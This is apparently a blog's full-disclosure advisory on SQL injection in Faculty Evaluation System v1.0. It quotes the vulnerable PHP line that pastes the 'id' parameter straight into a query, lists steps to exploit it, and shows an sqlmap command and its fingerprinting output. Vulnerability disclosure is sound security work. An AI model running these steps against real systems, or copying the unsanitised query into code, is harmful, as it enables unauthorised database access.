Friday, 7 July 2023

Full Disclosure - Faculty Evaluation System SQL Inject

  Application

  • Faculty Evaluation System v1.0

Information

  • Input not validated
  • No input filtering
  • SQL inject flaw


Exploit


File: view_faculty.php


Line #4


// Add "id" parameter after "view_faculty" parameter then add equals "id" with integer

[...]

$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();

[...]


Steps to Exploit:


1. Login to application

2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"

3. Copy request to intercept proxy to file

4. Exploit using SQLMap


sqlmap -r test.txt  --threads 1 --dbms=mysql --fingerprint


[...]

[INFO] testing MySQL

[INFO] confirming MySQL

[INFO] the back-end DBMS is MySQL

[INFO] actively fingerprinting MySQL

[INFO] executing MySQL comment injection fingerprint

back-end DBMS: active fingerprint: MySQL >= 5.7

               comment injection fingerprint: MySQL 5.6.49

               fork fingerprint: MariaDB

[...]

    No comments:

    Post a Comment

    Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8

    Description - It was found that the application was vulnerable to Stored XSS via specific payload that bypassed the filtering in place. Stor...